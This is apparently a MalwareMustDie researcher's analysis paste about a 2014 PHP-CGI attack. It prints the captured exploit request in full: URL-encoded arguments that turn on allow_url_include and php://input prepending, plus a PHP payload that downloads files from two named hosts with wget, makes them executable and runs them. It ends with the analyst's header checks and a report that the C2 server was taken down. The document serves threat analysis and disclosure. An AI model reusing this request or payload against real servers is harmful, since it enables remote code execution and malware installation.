// #MalwareMustDie sCRAPnote
// I'm a mu mu mu ? Is a lamer crap!
POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: I`m a mu mu mu ?
Content-Type: application/x-www-form-urlencoded
Content-Length: 502
Connection: close

<?php
$tmp = sys_get_temp_dir();
$path = getcwd();
$file = "e.html";
$url = "http://eleven11root.servepics.com";
system("wget $url -P - -O" . $tmp . "/e.html");
system("chmod -R 777" . $tmp ."/e.html");
chmod ($tmp."/".$file,0777);
system($tmp . "/e.html");
$file2 = "t.htm";
$url2 = "http://twelfe12root.servepics.com";
system("wget $url2 -P - -O" . $tmp . "/t.htm");
system("chmod -R 777" . $tmp ."/t.htm");
chmod ($tmp."/".$file2,0777);
system($tmp . "/t.htm");
echo $tmp;
echo $path;
die($tmp);
/* infected site dropped binaries */
wget http://eleven11root.servepics.com -P - -O ./e.html
wget http://twelfe12root.servepics.com -P - -O ./t.html
/* header checks */
--2014-07-25 12:48:57-- http://twelfe12root.servepics.com/
Resolving twelfe12root.servepics.com... 8.23.224.90
Caching twelfe12root.servepics.com => 8.23.224.90
Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
Created socket 4.
Releasing 0x00007fc878404890 (new refcount 1).
GET / HTTP/1.1
User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
Accept: */*
Host: twelfe12root.servepics.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Fri, 25 Jul 2014 03:48:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: http://127.0.0.1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
302 Found
Location: http://127.0.0.1 [following]
Closed fd 4
Connecting to 127.0.0.1:80... Closed fd 4
failed: Connection refused.
Releasing 0x00007fc878403ed0 (new refcount 0).
Deleting unused 0x00007fc878403ed0.
/* Encryption analysis */
%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
/* crack result */
https://twitter.com/MalwareMustDie/status/492534140340682754
/* status */
CNC was knocked down, @MMD Tango Team
different case, same incident: http://pastebin.com/VePW1zGP
#MalwareMustDie | cracked & reported by @unixfreaxjp